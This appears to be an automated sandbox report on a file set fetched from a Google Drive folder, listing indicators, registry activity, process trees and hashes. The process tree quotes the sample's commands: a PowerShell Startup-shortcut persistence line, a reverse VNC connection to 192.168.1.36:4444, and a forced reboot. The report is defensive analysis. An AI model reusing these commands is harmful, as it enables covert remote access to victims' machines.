hxxps://drive[.]google[.]com/drive/folders/1dnGxCTJg9pYs1ERMNm9wjVbiXLGHrXZh?usp=sharing

Analysis

max time kernel
73s
max time network
74s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
08-08-2024 20:30

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

https://drive.google.com/drive/folders/1dnGxCTJg9pYs1ERMNm9wjVbiXLGHrXZh?usp=sharing

Score

7^/10

discovery

Malware Config

Signatures

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.bat.lnk	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	drive.google.com
6	drive.google.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4424	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "237"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings	msedge.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

pid	Process
2624	msedge.exe
2624	msedge.exe
2380	msedge.exe
2380	msedge.exe
4068	identity_helper.exe
4068	identity_helper.exe
3140	msedge.exe
3140	msedge.exe
1920	msedge.exe
1920	msedge.exe
60	powershell.exe
60	powershell.exe
60	powershell.exe
3844	winvnc.exe
3844	winvnc.exe
3844	winvnc.exe
3844	winvnc.exe
4640	winvnc.exe
4640	winvnc.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs

pid	Process
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	60	powershell.exe
Token: SeShutdownPrivilege	2224	shutdown.exe
Token: SeRemoteShutdownPrivilege	2224	shutdown.exe

Suspicious use of FindShellTrayWindow 52 IoCs

pid	Process
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
3844	winvnc.exe
3844	winvnc.exe
3844	winvnc.exe
3844	winvnc.exe
3844	winvnc.exe
3844	winvnc.exe

Suspicious use of SendNotifyMessage 29 IoCs

pid	Process
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
2380	msedge.exe
3844	winvnc.exe
3844	winvnc.exe
3844	winvnc.exe
3844	winvnc.exe
3844	winvnc.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4644	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2380 wrote to memory of 752	2380	msedge.exe	83
PID 2380 wrote to memory of 752	2380	msedge.exe	83
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 4052	2380	msedge.exe	84
PID 2380 wrote to memory of 2624	2380	msedge.exe	85
PID 2380 wrote to memory of 2624	2380	msedge.exe	85
PID 2380 wrote to memory of 4324	2380	msedge.exe	86
PID 2380 wrote to memory of 4324	2380	msedge.exe	86
PID 2380 wrote to memory of 4324	2380	msedge.exe	86
PID 2380 wrote to memory of 4324	2380	msedge.exe	86
PID 2380 wrote to memory of 4324	2380	msedge.exe	86
PID 2380 wrote to memory of 4324	2380	msedge.exe	86
PID 2380 wrote to memory of 4324	2380	msedge.exe	86
PID 2380 wrote to memory of 4324	2380	msedge.exe	86
PID 2380 wrote to memory of 4324	2380	msedge.exe	86
PID 2380 wrote to memory of 4324	2380	msedge.exe	86
PID 2380 wrote to memory of 4324	2380	msedge.exe	86
PID 2380 wrote to memory of 4324	2380	msedge.exe	86
PID 2380 wrote to memory of 4324	2380	msedge.exe	86
PID 2380 wrote to memory of 4324	2380	msedge.exe	86
PID 2380 wrote to memory of 4324	2380	msedge.exe	86
PID 2380 wrote to memory of 4324	2380	msedge.exe	86
PID 2380 wrote to memory of 4324	2380	msedge.exe	86
PID 2380 wrote to memory of 4324	2380	msedge.exe	86
PID 2380 wrote to memory of 4324	2380	msedge.exe	86
PID 2380 wrote to memory of 4324	2380	msedge.exe	86

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://drive.google.com/drive/folders/1dnGxCTJg9pYs1ERMNm9wjVbiXLGHrXZh?usp=sharing
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff849ee46f8,0x7ff849ee4708,0x7ff849ee4718
  2⤵
  PID:752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,5574766401648193214,1932164166103779505,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
  2⤵
  PID:4052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,5574766401648193214,1932164166103779505,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1520 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,5574766401648193214,1932164166103779505,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2992 /prefetch:8
  2⤵
  PID:4324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5574766401648193214,1932164166103779505,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
  2⤵
  PID:2164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5574766401648193214,1932164166103779505,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
  2⤵
  PID:4960
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,5574766401648193214,1932164166103779505,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:8
  2⤵
  PID:4612
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,5574766401648193214,1932164166103779505,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5574766401648193214,1932164166103779505,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1
  2⤵
  PID:2704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5574766401648193214,1932164166103779505,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1
  2⤵
  PID:1808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5574766401648193214,1932164166103779505,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4180 /prefetch:1
  2⤵
  PID:1324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5574766401648193214,1932164166103779505,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:1
  2⤵
  PID:1688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5574766401648193214,1932164166103779505,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1
  2⤵
  PID:3940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5574766401648193214,1932164166103779505,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
  2⤵
  PID:3268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5574766401648193214,1932164166103779505,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
  2⤵
  PID:2568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2080,5574766401648193214,1932164166103779505,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3416 /prefetch:8
  2⤵
  PID:2868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5574766401648193214,1932164166103779505,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:1
  2⤵
  PID:1464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,5574766401648193214,1932164166103779505,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5574766401648193214,1932164166103779505,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2200 /prefetch:1
  2⤵
  PID:4532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5574766401648193214,1932164166103779505,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1828 /prefetch:1
  2⤵
  PID:3140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,5574766401648193214,1932164166103779505,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5464 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1920

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5028

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3408

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3612

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\client-20240808T203046Z-001\client\main.bat
1⤵
PID:1760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\client-20240808T203046Z-001\client\main.bat" "
1⤵
PID:840
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.bat.lnk');$s.TargetPath='C:\Users\Admin\Downloads\client-20240808T203046Z-001\client\main.bat';$s.Save()"
  2⤵
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:60
- C:\Users\Admin\Downloads\client-20240808T203046Z-001\client\winvnc.exe
  winvnc.exe -run
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3844
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4424
- C:\Users\Admin\Downloads\client-20240808T203046Z-001\client\winvnc.exe
  winvnc.exe -connect 192.168.1.36::4444
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4640
- C:\Windows\system32\shutdown.exe
  shutdown /r /f /t 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2224

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa395d055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:4644

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
1⤵
PID:3128

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
eeaa8087eba2f63f31e599f6a7b46ef4

SHA1
f639519deee0766a39cfe258d2ac48e3a9d5ac03

SHA256
50fe80c9435f601c30517d10f6a8a0ca6ff8ca2add7584df377371b5a5dbe2d9

SHA512
eaabfad92c84f422267615c55a863af12823c5e791bdcb30cabe17f72025e07df7383cf6cf0f08e28aa18a31c2aac5985cf5281a403e22fbcc1fb5e61c49fc3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b9569e123772ae290f9bac07e0d31748

SHA1
5806ed9b301d4178a959b26d7b7ccf2c0abc6741

SHA256
20ab88e23fb88186b82047cd0d6dc3cfa23422e4fd2b8f3c8437546a2a842c2b

SHA512
cfad8ce716ac815b37e8cc0e30141bfb3ca7f0d4ef101289bddcf6ed3c579bc34d369f2ec2f2dab98707843015633988eb97f1e911728031dd897750b8587795

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
c165efa2584e8378617f15180ecc1156

SHA1
34ebbff56a626d08cd953b009c0d5fd6cb8cedc0

SHA256
8e476954dca0b5edfebf7fd406d7d71b0edca37c0bbf671d379a6fb9762f3cd6

SHA512
2c43ee081da766e2a7c7177f0cdb04026e1355c3e17a0f04e560dfeefb33b2934369e45413de5303d505eaf4f96d91a4199c68f59932142dd31f2c3db0de90fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
7772a48a274c1c4312a7d2c035e07aa4

SHA1
5eb372762d2759280a6641453acc604dfe329806

SHA256
f6598fbee2bd842f26615ac3f9a8944d3c8e0bca2b37edfd7cc6093a6066b319

SHA512
c6ab44f267d2a4da9a07941e58e9f7771e5fe8e1543d75550d334e75f8a6772586a78109b222112fab6d553bb8ba36f044b61369576d1d2488c14e7b6d56f9e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
911ec8b43bb72f6b0600224a5c83fc1a

SHA1
88b2a3177ceba4dfba1d6e1b2463895792a23dea

SHA256
eb9658add42a1220a8ab5539553428af0ed3d082218f839c0ab77f49e777e009

SHA512
2924819232d0e2e41aba35df8870542fedb746bd05b2430edda6189ed837ec0dfa578655f7f49ebaafed7aacfa1d2da75ee51c299496c44876de92eb935af44c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
b07f822453ed15308dc174b12592171d

SHA1
ef7774fa35b81c093d623d9b2846e0c573e9dbce

SHA256
4357113bd84ba620304a73f08707807b619ed13df4750fdb4b1f229b457dda50

SHA512
f017822c6dd3e3f6d558ad433732daa9e902667318d84d864dae6525fa46f89f628d25378c8b986c07b28905be61c42c83af6a427d374842d61e1afd1724b9d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
cbef0c937df8f7bc60dfc496d0a71e72

SHA1
058831b229c0074876c3bccfb41eb9e1e02a3fc4

SHA256
dfa0abf4dc3657704fd1e278522034fb57196c7cb3058defb6f03f25c250bef1

SHA512
35c8db29f268e2bf54a3497f9ff51ebefccc9c93e86e39ecaea8aafb09cdf24fbb0ef63a149a87eada1f29e1ff5b7482e407d38772cc1a6be8b4f17a10f33cef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
d3d5e3e54e5553254083719fa22597b1

SHA1
fd6120565d1c2a2c413b7201ad4541141931e7ce

SHA256
4125e647dd19b29913315df4de567504f98e173177a87411e41ce1199f94e1b3

SHA512
4d4803d5f31d4627fb292a64bd3799739c2a7eadec51eaa800066380f9fad2243bae35d4598ef2e997da2f5c26e6b20501cd29801c22ecde6967524ed5c0bcab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57db2d.TMP

Filesize
1KB

MD5
cd4bf808496348ba8fa9a83ee76219fd

SHA1
3055ab6b12f5868fc1cc7ef117a43054b26607aa

SHA256
95585f383624f06ac4585625802a6757d38f1426355ca3c247c49d99b48a29d3

SHA512
26aea9c7d7180a5fb4339bd0199ddc6957cac6497b48b06cdcf0eaa41c39a40ce87ed70150aa12438c5e5415bd42ecdff75d9840c6afc4c127a44bfbdbfc437a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
f9d2f9f2b5ad2edca5e5a875ae96137b

SHA1
8fff8d23c3a06d45de015fae5dc881353af05fa2

SHA256
bd85f3672ae7edb2846a2f3b4f9da85f3eb86b3d8cfa373041a148d2292eaf1c

SHA512
a64f22ebe3a2b6e84dc4afe65d29e481545039fc0cb776da8432dd7037e64172a1195cbe71dbf098841d1fc643ef17428d632886d4e9b4bf454412a6cf1bef78

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
3b7793850b1ec7a941cd48f11b714718

SHA1
9cff924ad37301a117168555e3c49e305fb00bd5

SHA256
5a6f0203be538869cf31196a703a0a7a8c4e8ba646f4be40743a5689d124952f

SHA512
dffb72ef2a9f09745def120fd6c4f8ba105b88aabbfcff9a28afc52d49b521811a66ead2b5e2b3f6184b7e9b2fbde4f274d2c305f8db7eabfb3a0f5728f8dfbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5v25glwh.imq.ps1

Filesize
60B

MD5
